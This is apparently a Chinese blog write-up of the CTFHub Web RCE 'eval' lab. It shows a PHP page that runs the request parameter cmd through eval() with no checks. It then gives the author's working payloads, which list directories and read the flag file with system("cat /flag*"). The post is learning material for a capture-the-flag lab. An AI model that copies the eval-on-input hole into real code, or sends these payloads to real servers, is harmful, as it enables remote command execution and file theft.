CTFHub 技能树 Web RCE eval执行(学习记录)

马船长2024-12-15 17:23

eval执行

源代码

php 复制代码 
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

相关推荐
旖旎夜光24 分钟前
Linux(4)(下)
linux·学习
敲敲了个代码3 小时前
从硬编码到 Schema 推断:前端表单开发的工程化转型
前端·javascript·vue.js·学习·面试·职场和发展·前端框架
我命由我123456 小时前
SVG - SVG 引入(SVG 概述、SVG 基本使用、SVG 使用 CSS、SVG 使用 JavaScript、SVG 实例实操)
开发语言·前端·javascript·css·学习·ecmascript·学习方法
Fern_blog8 小时前
鸿蒙学习之路
学习
小智RE0-走在路上8 小时前
Python学习笔记(11) --数据可视化
笔记·python·学习
Asus.Blogs11 小时前
SSE + Resty + Goroutine + Channel 完整学习笔记
笔记·学习·golang
charlie11451419112 小时前
Git团队协作完全入门指南(上)
笔记·git·学习·教程·工程
迷茫的启明星12 小时前
Git命令学习
git·学习
全栈陈序员13 小时前
说说你对 Vue 的理解
前端·javascript·vue.js·学习·前端框架
热门推荐
01GitHub 镜像站点023D 圣诞树网页代码03从快手“12·22”直播攻击事件看:一次教科书式的业务层饱和攻击04UV安装并设置国内源05Gemini3 生成的基于手势控制3D粒子圣诞树06Linux下V2Ray安装配置指南07在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)08GLM-4.7 vs MiniMax-M2.1:代码工程理解09开源分享 | 超浪漫 3D 圣诞树立体动画(附零基础使用教程)10解决 WSL Ubuntu 中 /etc/resolv.conf 自动重置问题